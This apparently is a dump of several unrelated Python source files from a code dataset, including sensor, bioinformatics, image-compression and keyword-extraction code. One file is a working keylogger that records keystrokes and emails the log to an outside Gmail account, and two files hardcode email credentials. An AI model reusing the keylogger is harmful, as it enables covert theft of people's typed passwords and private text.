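# 0x2C (BW_RATE) = 0x0A selects a 100 Hz output rate, 0x2D (POWER_CTL) = 0x08
# enables measurement mode, and 0x31 (DATA_FORMAT) = 0x08 selects full
# resolution. Registers 0x32-0x37 read below hold the 10-bit two's-complement
# X/Y/Z samples, hence the "> 511: subtract 1024" sign correction.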
bus.write_byte_data(0x53, 0x2C, 0x0A)
bus.write_byte_data(0x53, 0x2D, 0x08)
bus.write_byte_data(0x53, 0x31, 0x08)
time.sleep(0.5)
data0 = bus.read_byte_data(0x53, 0x32)
data1 = bus.read_byte_data(0x53, 0x33)
xAccl = ((data1 & 0x03) * 256) + data0
if xAccl > 511 :
xAccl -= 1024
data0 = bus.read_byte_data(0x53, 0x34)
data1 = bus.read_byte_data(0x53, 0x35)
yAccl = ((data1 & 0x03) * 256) + data0
if yAccl > 511 :
yAccl -= 1024
data0 = bus.read_byte_data(0x53, 0x36)
data1 = bus.read_byte_data(0x53, 0x37)
zAccl = ((data1 & 0x03) * 256) + data0
if zAccl > 511 :
zAccl -= 1024
GPIO.output(TRIG, False)
GPIO.output(TRIG, True)
time.sleep(0.00001)  # hold TRIG high ~10 us so the ultrasonic sensor fires a ping
GPIO.output(TRIG, False)
while GPIO.input(ECHO)==0:
pulse_start = time.time()
while GPIO.input(ECHO)==1:
pulse_end = time.time()
pulse_duration = pulse_end - pulse_start
distance = int(pulse_duration * 17150)
message = "l=%d" %(distance)
print "distance is : %.1f " %distance
msg.attach(MIMEText(message,'plain'))
server=smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(fromaddr, 'password123@')
text="garbage level exceed"
text1="bin is not placed properly"
if distance < 10:
server.sendmail(fromaddr,toaddr,text)
if (xAccl<0 and zAccl>0 and yAccl>0):
server.sendmail(fromaddr,toaddr,text1)
if (yAccl<0 and zAccl>0 and xAccl>0):
server.sendmail(fromaddr,toaddr,text1)
server.quit()
|
[
"ghosearundhati96@gmail.com"
] |
ghosearundhati96@gmail.com
|
2150310528fef0892cc9b51cd2cf02ef51e65e81
|
7051d14616fb3a1f108f72332a116fc784d5b228
|
/Chapter_Rosalind/splc/splc.py
|
7e2089097e9d6b13ca557dcc26f06eb68863854e
|
[] |
no_license
|
demar01/python
|
8544b713c2e41394730f983c85f647ba6d503f55
|
2b020e8f1aef3d542bc94bc76fd9e3112f979133
|
refs/heads/main
| 2023-08-01T21:05:31.012662
| 2021-09-18T07:05:16
| 2021-09-18T07:05:16
| 358,561,780
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,270
|
py
|
# -*- coding: utf-8 -*-
"""
http://rosalind.info/problems/splc/
"""
'''
Problem
After identifying the exons and introns of an RNA string, we only need to delete the introns and concatenate the exons to form a new string ready for translation.
Given: A DNA string s (of length at most 1 kbp) and a collection of substrings of s acting as introns. All strings are given in FASTA format.
Return: A protein string resulting from transcribing and translating the exons of s. (Note: Only one solution will exist for the dataset provided.)
Sample Dataset
>Rosalind_10
ATGGTCTACATAGCTGACAAACAGCACGTAGCAATCGGTCGAATCTCGAGAGGCATATGGTCACATGATCGGTCGAGCGTGTTTCAAAGTTTGCGCCTAG
>Rosalind_12
ATCGGTCGAA
>Rosalind_15
ATCGGTCGAGCGTGT
Sample Output
MVYIADKQHVASREAYGHMFKVCA
'''
import sys
sys.path.append("/Users/dermit01/Documents/python/Chapter_Rosalind/")
import rosalind_utils
from Bio.Seq import Seq
from Bio import SeqIO
def splc():
recs = rosalind_utils.read_fasta("Chapter_Rosalind/splc/rosalind_splc.txt")
seqs = [rec[1] for rec in recs]
exon = seqs[0]
introns = sorted(seqs[1:], key=lambda s: len(s), reverse=True)
for intron in introns:
exon = exon.replace(intron, "", 1)
prot = Seq(exon).transcribe().translate()
return prot[:-1]
|
[
"maria.dermit@qmul.ac.uk"
] |
maria.dermit@qmul.ac.uk
|
bffddf8b0f1b8d0b7b5e3f7db6384a95bbf3a8bb
|
6d11d48fb6d6ce45d2f9866f05310ae873a727dc
|
/code/run_exp.py
|
3b629b7a22b90091efb75193f2231d5ad0fd6f22
|
[
"MIT"
] |
permissive
|
BasemElbarashy/image-compression-and-semantic-segmentation
|
634b107154377d4ac1a41fba5777d21d6f8ad075
|
760d7f779e97659f3f8f59f68eaa4268ec08618b
|
refs/heads/master
| 2020-12-19T02:05:02.249473
| 2020-01-22T15:08:14
| 2020-01-22T15:08:14
| 235,588,116
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,944
|
py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
from logging_formatter import Logger
import glob
import pickle
import tensorflow as tf
from bls2017 import train, compress, decompress, depth_train, depth_compress
import numpy as np
import shutil
import time
logger = Logger()
def run_exp(exp_args):
# create exp dir
expDir = os.path.join(exp_args.outdir, exp_args.exp_name)
lambdas = args.lambdas.split(',')
lambdas = [float(x) for x in lambdas]
if not os.path.exists(expDir):
os.makedirs(expDir)
logger.info('Creating experiment directory ' + expDir + '/')
else:
logger.info('Experiment directory already exist')
for lmbda in lambdas:
# for each lambda create subdir
train_dir = os.path.join(expDir, 'lambda_'+str(lmbda))
metrics_path = os.path.join(train_dir, 'metrics_args.pkl')
train_time_path = os.path.join(train_dir, 'time_analysis.txt')
exp_args.checkpoint_dir = train_dir
exp_args.lmbda = lmbda
if not exp_args.test_only:
if not os.path.exists(train_dir):
logger.info('Creating subdir in experiment directory for lambda = '+str(lmbda))
os.makedirs(train_dir)
logger.info('Saving a copy of the code used for running this experiment')
os.makedirs(os.path.join(train_dir,'code'))
code_files = os.listdir('examples/')
for code_file in code_files:
_, ext = os.path.splitext(code_file)
if ext == '.py' or ext =='.ipynb':
code_file = os.path.join('examples/', code_file)
shutil.copy(code_file, os.path.join(train_dir, 'code'))
else:
logger.warn('Trained with lambda= '+str(lmbda)+' before, skipping')
continue
try:
logger.info('Start training')
train_time_st = time.time()
if exp_args.depth:
depth_train(exp_args)
else:
train(exp_args)
tf.reset_default_graph()
train_time_secs = int(time.time() - train_time_st)
except Exception as e:
logger.error(str(e))
shutil.rmtree(train_dir)
raise
compressed_reconstructed_dir = os.path.join(train_dir, 'compressed_reconstructed_images')
os.makedirs(compressed_reconstructed_dir)
test_files= glob.glob(exp_args.test_glob)
test_files.sort()
test_files = test_files[ 0:min(exp_args.maxtestimgs, len(test_files))]
if exp_args.depth:
test_depth_files= glob.glob(exp_args.test_depth_glob)
test_depth_files.sort()
test_depth_files = test_depth_files[ 0:min(exp_args.maxtestimgs, len(test_depth_files))]
logger.info('Testing the model on '+str(len(test_files))+' images and save the reconstructed images')
msel, psnrl, msssiml, msssim_dbl, eval_bppl, bppl = [], [], [], [], [], []
test_time_st = time.time()
for i, test_file in enumerate(test_files):
test_file_name = os.path.splitext(os.path.split(test_file)[1])[0]
compressed_im_path = os.path.join(compressed_reconstructed_dir,test_file_name+'_compressed'+'.bin')
reconstucted_im_path = os.path.join(compressed_reconstructed_dir,test_file_name+'_reconstructed'+'.png')
im_metrics_path = os.path.join(compressed_reconstructed_dir,test_file_name+'_metrics'+'.pkl')
if exp_args.depth:
exp_args.input = (test_file, test_depth_files[i])
exp_args.output = compressed_im_path
mse, psnr, msssim, msssim_db, eval_bpp, bpp = depth_compress(exp_args)
else:
exp_args.input = test_file
exp_args.output = compressed_im_path
mse, psnr, msssim, msssim_db, eval_bpp, bpp = compress(exp_args)
im_metrics = {'mse':mse,'psnr':psnr, 'msssim':msssim,'msssim_db':msssim_db,'eval_bpp':eval_bpp,'bpp':bpp}
with open(im_metrics_path, "wb") as fp:
pickle.dump(im_metrics, fp)
msel.append(mse)
psnrl.append(psnr)
msssiml.append(msssim)
msssim_dbl.append(msssim_db)
eval_bppl.append(eval_bpp)
bppl.append(bpp)
tf.reset_default_graph()
exp_args.input = compressed_im_path
exp_args.output = reconstucted_im_path
decompress(exp_args)
tf.reset_default_graph()
test_time_secs = int(time.time() - test_time_st)
logger.info('Averaging metrics and save them with the exp_args in pickle file metrics_args.pkl' )
mse = np.mean(msel)
psnr = np.mean(psnrl)
msssim = np.mean(msssiml)
eval_bpp = np.mean(eval_bppl)
bpp = np.mean(bppl)
msssim_db = np.mean(msssim_dbl)
logger.info('MSE = '+str(mse))
logger.info('PSNR = '+str(psnr))
logger.info('MS-SSIM = '+str(msssim))
logger.info('MS-SSIM db = '+str(msssim_db))
logger.info('Eval_bpp = '+str(eval_bpp))
logger.info('bpp = '+str(bpp))
exp_avg_metrics = {'mse': mse, 'psnr': psnr, 'msssim': msssim,'msssim_db':msssim_db, 'eval_bpp': eval_bpp, 'bpp': bpp}
with open(metrics_path, "wb") as fp:
pickle.dump({'exp_avg_metrics': exp_avg_metrics, 'exp_args': exp_args}, fp)
if not exp_args.test_only:
time_analysis = {'training took (sec)':train_time_secs,'testing took (sec)': test_time_secs }
f = open(train_time_path, "w")
for k, v in time_analysis.items():
f.write(str(k) + ':' + str(v) + '\n')
f.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
"command", choices=["train", "compress", "decompress", "exp"],
help="What to do: 'train' loads training data and trains (or continues "
"to train) a new model. 'compress' reads an image file (lossless "
"PNG format) and writes a compressed binary file. 'decompress' "
"reads a binary file and reconstructs the image (in PNG format). "
"input and output filenames need to be provided for the latter "
"two options.")
parser.add_argument(
"input", nargs="?",
help="Input filename.")
parser.add_argument(
"output", nargs="?",
help="Output filename.")
parser.add_argument(
"--verbose", "-v", action="store_true",
help="Report bitrate and distortion when training or compressing.")
parser.add_argument(
"--num_filters", type=int, default=128,
help="Number of filters per layer.")
parser.add_argument(
"--checkpoint_dir", default="train",
help="Directory where to save/load model checkpoints.")
parser.add_argument(
"--train_glob", default="images/*.png",
help="Glob pattern identifying training data. This pattern must expand "
"to a list of RGB images in PNG format.")
parser.add_argument(
"--batchsize", type=int, default=8,
help="Batch size for training.")
parser.add_argument(
"--patchsize", type=int, default=256,
help="Size of image patches for training.")
parser.add_argument(
"--lambda", type=float, default=0.01, dest="lmbda",
help="Lambda for rate-distortion tradeoff.")
parser.add_argument(
"--last_step", type=int, default=1000000,
help="Train up to this number of steps.")
parser.add_argument(
"--preprocess_threads", type=int, default=16,
help="Number of CPU threads to use for parallel decoding of training "
"images.")
# -----------------------
parser.add_argument(
"--exp_name", type=str, default='exp',
help="Name of the exp directory")
parser.add_argument(
"--exp_description", type=str, default='',
help="details of model architecture used, dataset ...")
parser.add_argument(
"--lambdas", type=str, default='64,1024',
help="list of lambda values that the model will be trained with")
parser.add_argument(
"--test_glob", default='test_image/*.png',
help="Glob pattern identifying test data. This pattern must expand" )
  parser.add_argument(
      "--outdir", type=str, default='experiments/',
      help="Directory under which experiment subdirectories are created.")
  parser.add_argument(
      "--gpu", type=str, default='0',
      help="Value assigned to CUDA_VISIBLE_DEVICES.")
  parser.add_argument(
      "--maxtrainimgs", type=int, default=100000000,
      help="Maximum number of training images to use.")
  parser.add_argument(
      "--maxtestimgs", type=int, default=100000000,
      help="Maximum number of test images to use.")
parser.add_argument(
"--test_depth_glob", default='',
help="Glob pattern identifying test depth data. This pattern must expand" )
parser.add_argument(
"--train_depth_glob", default='',
help="Glob pattern identifying training depth data. This pattern must expand" )
parser.add_argument(
"--depth", "-d", action="store_true",
help="use depth data")
parser.add_argument(
"--test_only", "-t", action="store_true",
help="test the trained model")
args = parser.parse_args()
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu
if args.command == "train":
train(args)
elif args.command == "compress":
if args.input is None or args.output is None:
raise ValueError("Need input and output filename for compression.")
compress(args)
elif args.command == "decompress":
if args.input is None or args.output is None:
raise ValueError("Need input and output filename for decompression.")
decompress(args)
elif args.command == "exp":
run_exp(args)
|
[
"mllover1992@gmail.com"
] |
mllover1992@gmail.com
|
e0ce5752ad88708ef35d5a8042862cc05fb1057b
|
ddf896fb5487228d1f8d56f19d9e69425554b2aa
|
/main/utils/response_code.py
|
ff3a4e6dd0f37f17bad967a8a06f6991497219ea
|
[] |
no_license
|
quinn-lee/novalinks
|
caf057b60d721cecb92b526bde1647e5db7e658c
|
8bb45cdaff6bde61fe00e41924109fb48c36cbd5
|
refs/heads/main
| 2023-08-25T15:30:49.049926
| 2021-10-28T12:06:27
| 2021-10-28T12:06:27
| 352,111,500
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,232
|
py
|
# coding:utf-8
class RET:
OK = "0"
AUTHERROR = "2001"
DBERR = "4001"
NODATA = "4002"
DATAEXIST = "4003"
DATAERR = "4004"
SESSIONERR = "4101"
LOGINERR = "4102"
PARAMERR = "4103"
USERERR = "4104"
ROLEERR = "4105"
PWDERR = "4106"
REQERR = "4201"
IPERR = "4202"
THIRDERR = "4301"
IOERR = "4302"
SERVERERR = "4500"
UNKOWNERR = "4501"
NOTJSON = "4600"
NOTXML = "4601"
error_map = {
RET.OK: u"成功",
RET.AUTHERROR: u"权限验证失败",
RET.DBERR: u"数据库查询错误",
RET.NODATA: u"无数据",
RET.DATAEXIST: u"数据已存在",
RET.DATAERR: u"数据错误",
RET.SESSIONERR: u"用户未登录",
RET.LOGINERR: u"用户登录失败",
RET.PARAMERR: u"参数错误",
RET.USERERR: u"用户不存在或未激活",
RET.ROLEERR: u"用户身份错误",
RET.PWDERR: u"密码错误",
RET.REQERR: u"非法请求或请求次数受限",
RET.IPERR: u"IP受限",
RET.THIRDERR: u"第三方系统错误",
RET.IOERR: u"文件读写错误",
RET.SERVERERR: u"内部错误",
RET.UNKOWNERR: u"未知错误",
    RET.NOTJSON: u"请求非Json格式",
    RET.NOTXML: u"请求非XML格式"
}
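# A minimal usage sketch (assumed; not part of this module):
#
#     def error_response(code):
#         return {"errno": code, "errmsg": error_map[code]}
#
# error_response(RET.NODATA) -> {"errno": "4002", "errmsg": u"无数据"}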
|
[
"lifuyuan33@gmail.com"
] |
lifuyuan33@gmail.com
|
aad30ae2f499a4fe38ffa603bb96df94f9fd7b53
|
be2ed81c9c35a7095c90addc9285a8d56d233ce7
|
/src/Item.py
|
61e0a114693edbd2fc072368225f0e229c22372d
|
[] |
no_license
|
AustinBCole/Intro-Python-II
|
ea4696d9caec6a954ba496c54ea3a528db883a90
|
130ab3172ea13f468fbada5023c44b78ddd5a5a0
|
refs/heads/master
| 2020-05-29T17:48:43.152760
| 2019-05-30T23:31:01
| 2019-05-30T23:31:01
| 189,284,228
| 1
| 0
| null | 2019-05-29T19:13:46
| 2019-05-29T19:13:45
| null |
UTF-8
|
Python
| false
| false
| 1,027
|
py
|
# This is the file for the Item class and other Item subclasses. Each Item will include at least a name and description.
class Item:
def __init__(self, name, description, point_value):
self.name = name
self.description = description
self.point_value = point_value
def on_take(self):
print(f"You have picked up the {self.name}.")
def on_drop(self):
print(f"You have dropped the {self.name}.")
class PuzzleItem(Item):
def __init__(self, name, description, point_value, puzzle_solved = False):
super().__init__(name, description, point_value)
class Treasure(Item):
def __init__(self, name, description, point_value):
super().__init__(name, description, point_value)
class LightSource(Item):
def __init__(self, name, description, point_value):
super().__init__(name, description, point_value)
def on_drop(self):
print("\nIt is not wise to drop your source of light!\n")
print(f"You have dropped the {self.name}.\n")
|
[
"austin.cole.chileno@gmail.com"
] |
austin.cole.chileno@gmail.com
|
0e863e8888aa0fe019d8daa53d295348ed7b230f
|
ce8a9e0d9d049d223e11924ab94b761560c091d1
|
/main.py
|
1c437615f87ebe588ffcce2e502879626e7a1345
|
[] |
no_license
|
ZeinShehab/Key_Logger
|
e9b4d5f845d47d38311b0d85dbaa4de645f99864
|
73a41fcf62b2262965fd2ff34fd829855eba421d
|
refs/heads/master
| 2023-01-01T09:47:51.025702
| 2020-10-21T09:31:27
| 2020-10-21T09:31:27
| 305,974,058
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,332
|
py
|
from pynput.keyboard import Key, Listener
from mail import SendMessage
import datetime
import time
count = 0
keys = []
def on_press(key):
global count, keys
count += 1
keys.append(key)
print('{} pressed'.format(key))
if count >= 1:
count = 0
write_file(keys)
keys = []
def write_file(keys):
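    # str(key) looks like "'a'" for printable keys and "Key.space"/"Key.enter"
    # for special keys: strip the quotes, map space and enter to whitespace,
    # and drop any remaining special keys (names still containing "Key").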
with open('log.txt', 'a') as f:
for key in keys:
k = str(key).replace("'", "")
if k.find('space') > 0:
f.write(" ")
elif k.find('enter') > 0:
f.write("\n")
elif k.find('Key') == -1:
f.write(k)
def on_release(key):
if key == Key.insert:
send_log()
print('\n[!] Shutting down...')
time.sleep(1.5)
return False
def clear():
file = open("log.txt", 'w')
file.truncate(0)
file.close()
def send_log():
print('\n[+] Sending log...')
message = SendMessage('logsender12@gmail.com','gyk742des')
message.subject('Key Logger log')
message.body('This is the data recorded by the key logger on {}'.format(datetime.datetime.now()))
message.attach('log.txt', 'log.txt')
message.send_mail('logreceiver12@gmail.com')
clear()
with Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()
|
[
"zeinshehab@outlook.com"
] |
zeinshehab@outlook.com
|
48cabdc9e9790d4b88e8a489a10a4d9f616671c7
|
02d7676fbe35cc20ab16ee0fc323af88aa6fdbb2
|
/zip_extractor.py
|
1fd75e97bb0123585bd52ac5b8852a55db2e1db6
|
[] |
no_license
|
Constin-Joseph/ZIP_EXTRACTOR_AND_EXTRACT_INTO_SAME_ZIP_FOLDER_NAME
|
91a058f1859134b8263c7983aa42172be6b7c17e
|
93e16908e57544c41f8216975cef5fa84e9f88af
|
refs/heads/master
| 2020-09-12T12:35:06.904073
| 2019-11-18T11:24:21
| 2019-11-18T11:24:21
| 222,427,353
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 408
|
py
|
import os
import glob
import zipfile
def extractor(b,c):
dir_name_base = b
dir_name_base1=c
for arc_name in glob.iglob(os.path.join(dir_name_base, "*.zip")):
arc_dir_name = os.path.splitext(os.path.basename(arc_name))[0]
zf = zipfile.ZipFile(arc_name)
zf.extractall(path=os.path.join(dir_name_base1, arc_dir_name))
zf.close()
if __name__ == '__main__':
    # path1/path2 are placeholders: the directory holding the .zip files and
    # the directory to extract into, respectively.
    path1 = '/path/to/zip/folder'
    path2 = '/path/to/output/folder'
    extractor(path1, path2)
|
[
"noreply@github.com"
] |
Constin-Joseph.noreply@github.com
|
5e69c64504234a60e30d75476b388929c83fef33
|
95c4bb5c168f6afd3b833c1dce79a367b59f5fd7
|
/matrices y listas/sin duplicados.py
|
897a4e3a1a7ddc39f5d86909d24905338264684d
|
[] |
no_license
|
MikeDev0X/PythonPracticeEcercises
|
2abced3bda9e43a7b5e41decc3d3472f5df3f52a
|
c44dc15e691b65f58d0c50dffa093c22d73d2d69
|
refs/heads/master
| 2023-06-12T11:11:19.925477
| 2021-07-01T22:09:34
| 2021-07-01T22:09:34
| 382,172,280
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 450
|
py
|
'''Miguel Jiménez Padilla
Without duplicates'''
def sinDup():
elem=int(input())
if elem>0:
lista=[]
num=''
for i in range (0,elem):
num=input()
lista.append(num)
newlist=[]
for x in lista:
            if x not in newlist:
newlist.append(x)
print(lista)
print(newlist)
else:
print('Error')
sinDup()
|
[
"mike0vortex@gmail.com"
] |
mike0vortex@gmail.com
|
973632a7c8683bfc4870158b7ba92ba76228c912
|
7eed980f0bbc4a8ec98ca1e90365ef93c3f66ce9
|
/spiders/RAKE/rake.py
|
546e77bc3994fc3751a681f9580442df15b126c2
|
[
"MIT"
] |
permissive
|
Sevenforty740/ZHIKU
|
185c0b004f8a6fcaeb195fae9fbc983bfdfa8fa1
|
5b25c58358f9247797d8a7a094cdaff841ed1fc0
|
refs/heads/master
| 2022-11-15T16:35:08.960080
| 2020-07-11T02:15:06
| 2020-07-11T02:15:06
| 278,771,350
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,457
|
py
|
# Implementation of RAKE - Rapid Automatic Keyword Extraction algorithm
# as described in:
# Rose, S., D. Engel, N. Cramer, and W. Cowley (2010).
# Automatic keyword extraction from individual documents.
# In M. W. Berry and J. Kogan (Eds.), Text Mining: Applications and Theory. John Wiley and Sons, Ltd.
import re
import operator
debug = False
test = False
def is_number(s):
try:
float(s) if '.' in s else int(s)
return True
except ValueError:
return False
def load_stop_words(stop_word_file):
"""
Utility function to load stop words from a file and return as a list of words
@param stop_word_file Path and file name of a file containing stop words.
@return list A list of stop words.
"""
stop_words = []
for line in open(stop_word_file):
if line.strip()[0:1] != "#":
for word in line.split(): # in case more than one per line
stop_words.append(word)
return stop_words
def separate_words(text, min_word_return_size):
"""
    Utility function to return a list of all words that have a length greater than a specified number of characters.
@param text The text that must be split in to words.
@param min_word_return_size The minimum no of characters a word must have to be included.
"""
splitter = re.compile('[^a-zA-Z0-9_\\+\\-/]')
words = []
for single_word in splitter.split(text):
current_word = single_word.strip().lower()
#leave numbers in phrase, but don't count as words, since they tend to invalidate scores of their phrases
if len(current_word) > min_word_return_size and current_word != '' and not is_number(current_word):
words.append(current_word)
return words
def split_sentences(text):
"""
Utility function to return a list of sentences.
@param text The text that must be split in to sentences.
"""
sentence_delimiters = re.compile(u'[.!?,;:\t\\\\"\\(\\)\\\'\u2019\u2013]|\\s\\-\\s')
sentences = sentence_delimiters.split(text)
return sentences
def build_stop_word_regex(stop_word_file_path):
stop_word_list = load_stop_words(stop_word_file_path)
stop_word_regex_list = []
for word in stop_word_list:
word_regex = r'\b' + word + r'(?![\w-])' # added look ahead for hyphen
stop_word_regex_list.append(word_regex)
stop_word_pattern = re.compile('|'.join(stop_word_regex_list), re.IGNORECASE)
return stop_word_pattern
def generate_candidate_keywords(sentence_list, stopword_pattern):
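    # Stop words act as phrase delimiters: each is replaced by '|', and the
    # remaining runs of content words become candidate phrases, e.g. with stop
    # words {of}: "systems of linear constraints" -> ["systems", "linear constraints"].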
phrase_list = []
for s in sentence_list:
tmp = re.sub(stopword_pattern, '|', s.strip())
phrases = tmp.split("|")
for phrase in phrases:
phrase = phrase.strip().lower()
if phrase != "":
phrase_list.append(phrase)
return phrase_list
def calculate_word_scores(phraseList):
word_frequency = {}
word_degree = {}
for phrase in phraseList:
word_list = separate_words(phrase, 0)
word_list_length = len(word_list)
word_list_degree = word_list_length - 1
#if word_list_degree > 3: word_list_degree = 3 #exp.
for word in word_list:
word_frequency.setdefault(word, 0)
word_frequency[word] += 1
word_degree.setdefault(word, 0)
word_degree[word] += word_list_degree #orig.
#word_degree[word] += 1/(word_list_length*1.0) #exp.
for item in word_frequency:
word_degree[item] = word_degree[item] + word_frequency[item]
    # Calculate word scores = deg(w)/freq(w)
word_score = {}
for item in word_frequency:
word_score.setdefault(item, 0)
word_score[item] = word_degree[item] / (word_frequency[item] * 1.0) #orig.
#word_score[item] = word_frequency[item]/(word_degree[item] * 1.0) #exp.
return word_score
def generate_candidate_keyword_scores(phrase_list, word_score):
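    # A candidate phrase's score is the sum of its member words' deg/freq scores.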
keyword_candidates = {}
for phrase in phrase_list:
keyword_candidates.setdefault(phrase, 0)
word_list = separate_words(phrase, 0)
candidate_score = 0
for word in word_list:
candidate_score += word_score[word]
keyword_candidates[phrase] = candidate_score
return keyword_candidates
class Rake(object):
def __init__(self, stop_words_path):
self.stop_words_path = stop_words_path
self.__stop_words_pattern = build_stop_word_regex(stop_words_path)
def run(self, text):
sentence_list = split_sentences(text)
phrase_list = generate_candidate_keywords(sentence_list, self.__stop_words_pattern)
word_scores = calculate_word_scores(phrase_list)
keyword_candidates = generate_candidate_keyword_scores(phrase_list, word_scores)
sorted_keywords = sorted(keyword_candidates.items(), key=operator.itemgetter(1), reverse=True)
return sorted_keywords
if test:
text = """
Orlando cops have given up using Amazon’s controversial cloud-based facial recognition to monitor CCTV cameras dotted around the Florida city – after a nightmare year of technical breakdowns.
The decision came after officers attempted and failed to tap into Amazon’s Rekognition API, which they hoped would automatically flag up suspected criminals in streams of live surveillance camera footage. After 15 fruitless months of trying to get the thing working properly, with help from Amazon's staffers, the US city's police force cancelled its contract with the web giant.
"We haven't even established a stream today," the city’s chief information officer Rosa Akhtarkhavari told the Orlando Weekly on Thursday. "We're talking about more than a year later. We have not, today, established a reliable stream."
The plod wanted to feed photos of suspected or known crooks into Amazon Web Services' Rekognition API, and have the backend software automatically search live streams of CCTV footage for occurrences of those faces in real time, allowing officers to know immediately the whereabouts of persons of interest. Amazon techies had apparently visited the city numerous times to work with the police to get the system to work properly.
"""
# Split text into sentences
sentenceList = split_sentences(text)
#stoppath = "FoxStoplist.txt" #Fox stoplist contains "numbers", so it will not find "natural numbers" like in Table 1.1
stoppath = "SmartStoplist.txt" #SMART stoplist misses some of the lower-scoring keywords in Figure 1.5, which means that the top 1/3 cuts off one of the 4.0 score words in Table 1.1
stopwordpattern = build_stop_word_regex(stoppath)
# generate candidate keywords
phraseList = generate_candidate_keywords(sentenceList, stopwordpattern)
# calculate individual word scores
wordscores = calculate_word_scores(phraseList)
# generate candidate keyword scores
keywordcandidates = generate_candidate_keyword_scores(phraseList, wordscores)
if debug:
print(keywordcandidates)
sortedKeywords = sorted(keywordcandidates.items(), key=operator.itemgetter(1), reverse=True)
if debug:
print(sortedKeywords)
totalKeywords = len(sortedKeywords)
if debug:
print(totalKeywords)
print(sortedKeywords[0:int(totalKeywords / 3)])
print('---------------------------------------------------------')
rake = Rake("SmartStoplist.txt")
keywords = rake.run(text)
print(keywords)
|
[
"125045209@qq.com"
] |
125045209@qq.com
|
081beb03c48dbdcbc41bbeb2a87431355a67be1f
|
550207ff24c3afaa3f98aa0fd505231121daf210
|
/Hello_World.py
|
a698d6eefe397558cddd0b0686065531a2d70a28
|
[] |
no_license
|
uakin95/Deneme
|
46090d7fe181b08b76fca83d7336c81f779109bd
|
93b6758b8f9e139b89c10313254d9f4e1dff4d0e
|
refs/heads/main
| 2023-06-10T23:41:08.847464
| 2021-07-04T10:22:02
| 2021-07-04T10:22:02
| 382,816,181
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 61
|
py
|
print("Hello World")
# I made a change
# A new change
|
[
"utkuakin95@gmail.com"
] |
utkuakin95@gmail.com
|
2e9b77089880079fdb7d199d0b91502703b5d26f
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_206/788.py
|
e8b84134907f46ad0cbe2712afd5aa1543611f5d
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 823
|
py
|
# coding: utf-8
# In[2]:
import numpy as np
import itertools as it
import collections as col
# In[3]:
import sys
sys.setrecursionlimit(10000)
# In[4]:
import networkx as nx
import matplotlib.pyplot as plt
# In[1]:
def solve(*args):
print(args)
# In[16]:
def solve(D, N, Horses):
    # Each horse starting at x[0] with speed x[1] reaches the destination D
    # after (D - x[0]) / x[1] seconds; we cannot pass the slowest horse, so the
    # best constant speed is D divided by that maximum arrival time.
    t = [float(D - x[0]) / x[1] for x in Horses]
    sp = max(t)
    return D / sp
# In[ ]:
# print(solve(5, 5))  # leftover debug call; it is missing the Horses argument
# In[18]:
path = r'C:\Users\Shachar\Downloads\A-small-attempt0.in'
with open(path, 'r') as f, open(path[:-2]+'out', 'w') as outf:
T = int(f.readline())
for test_index in range(T):
D,N = [int(x) for x in f.readline().strip().split()]
Horses = [ [int(x) for x in f.readline().strip().split()] for _ in range(N)]
outf.write('Case #{}: {}\n'.format(test_index+1, solve(D,N,Horses)))
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
2ad7507ea1d4e5d99a5df93103dbc4567a8bc550
|
79e222e5ffae7f6eac61bcf58db8bc297f3448cd
|
/testing/conftest.py
|
8f54f6687ee1e88f9fd36a4957511dbc1ba52615
|
[] |
no_license
|
jhannah01/redisent
|
6642d2dbe6c04434acf37407a3d95d4fec80ee48
|
b31d724b47cccd688523f224b537e14c2435e124
|
refs/heads/master
| 2023-07-30T19:04:55.200616
| 2021-02-02T02:03:11
| 2021-02-02T02:03:11
| 332,575,184
| 1
| 0
| null | 2021-02-02T02:03:12
| 2021-01-24T22:59:23
|
Python
|
UTF-8
|
Python
| false
| false
| 396
|
py
|
import pytest
import aioredis
import fakeredis
import fakeredis.aioredis
import redis
pytestmark = [pytest.mark.asyncio]
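# Both fixtures monkeypatch the real client classes with their fakeredis
# equivalents, so the test suite never needs a live Redis server.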
@pytest.fixture()
def use_fake_aioredis(mocker):
mocker.patch.object(aioredis, 'ConnectionsPool', new=fakeredis.aioredis.FakeConnectionsPool)
@pytest.fixture()
def use_fake_redis(mocker):
mocker.patch.object(redis, 'StrictRedis', new=fakeredis.FakeStrictRedis)
|
[
"jon@synistree.com"
] |
jon@synistree.com
|
a9e934b9717261455daf003af05bd1a4579c86ae
|
9231713f6fd5a45baafa42a00bba5c36b11168bb
|
/search1/venv/Scripts/easy_install-3.7-script.py
|
cf100cbf5f55ab6f80e1c7d439f2554332ee01f5
|
[] |
no_license
|
Bizzle917/CourseDiscussion
|
095c0593d33f5db09b4db0f3a05da8fcef6cf302
|
7369696ef6a02f94730e086ea8320efb1f5baeec
|
refs/heads/master
| 2022-06-23T21:36:42.322950
| 2020-05-04T04:06:10
| 2020-05-04T04:06:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 430
|
py
|
#!D:\search1\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
